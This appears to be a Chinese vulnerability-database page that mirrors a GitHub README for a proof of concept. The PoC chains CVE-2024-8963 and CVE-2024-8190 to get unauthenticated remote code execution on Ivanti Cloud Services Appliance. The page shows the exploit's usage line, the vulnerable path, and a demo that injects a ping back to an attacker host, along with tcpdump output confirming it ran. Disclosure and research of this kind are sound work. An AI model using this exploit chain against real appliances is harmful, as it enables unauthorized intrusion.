漏洞平台

POC详情： ba11d8c3c065cf664e45f4d69c320035c0e86adb

来源

https://github.com/flyingllama87/CVE-2024-8190-unauth

关联漏洞

标题： Ivanti Cloud Services Appliance 安全漏洞 (CVE-2024-8190)
描述：Ivanti Cloud Services Appliance（Csa）是美国Ivanti公司的一种 Internet 设备。可通过 Internet 提供安全的通信和功能。 Ivanti Cloud Services Appliance 4.6 版本之前存在安全漏洞，该漏洞源于包含一个操作系统命令注入漏洞。经过身份验证的远程攻击者利用该漏洞可以获得远程代码执行。

描述

Combining CVE-2024-8963 & CVE-2024-8190 - For Unauthenticated RCE on Ivanti CSA 4.6 and below

介绍

## CVE-2024-8190 unauthenticated

### Description
Combining CVE-2024-8963 &amp; CVE-2024-8190 - PoC for Unauthenticated RCE on Ivanti CSA 4.6 and below.

**CVE-2024-8963**
> Path Traversal in the Ivanti CSA before 4.6 Patch 519 allows a remote unauthenticated attacker to access restricted functionality.

**CVE-2024-8190**
> An OS command injection vulnerability in Ivanti Cloud Services Appliance versions 4.6 Patch 518 and before allows a remote authenticated attacker to obtain remote code execution. The attacker must have admin level privileges to exploit this vulnerability.

This PoC combines the two to demonstrate how CVE-2024-8190 can be used unauthenticated.

### Usage

```
python3 ./cve-2024-8190.py <target_url> '<CMD>'
```

#### Demo

```
$ python3 ./cve-2024-8190.py https://<target> 'ping -c 4 <attacker>'
[!] WARNING: This script is for authorized testing and educational purposes only. Unauthorized use is illegal.
[*] Fetching https://<target>/client/index.php%3F.php/gsb/datetime.php...
[+] Got LDCSA_CSRF value: sid:483045<REMOVED>
[*] Sending payload...
[!] Request timed out. Check if the command executed on the target.
```

#### Response
```
$ sudo tcpdump -n "icmp" -l
11:43:15.135004 IP <target> > <attacker> ICMP echo request, id 30001, seq 1, length 64
11:43:16.135647 IP <target> > <attacker>: ICMP echo request, id 30001, seq 2, length 64
11:43:17.137707 IP <target> > <attacker>: ICMP echo request, id 30001, seq 3, length 64
11:43:18.137085 IP <target> > <attacker>: ICMP echo request, id 30001, seq 4, length 64
```

### Thanks

Horizon3.ai's CVE-2024-8190 PoC this is heavily based off: <BR />
https://github.com/horizon3ai/CVE-2024-8190

ProjectDiscovery's nuclei template for CVE-2024-8963.yaml: <BR />
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-8963.yaml

P.S. ProjectDiscovery rocks!

### Disclaimer

Don't be a dickhead.

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.

文件快照


 [4.0K]  /data/pocs/ba11d8c3c065cf664e45f4d69c320035c0e86adb
├── [2.2K]  cve-2024-8190.py
└── [2.2K]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。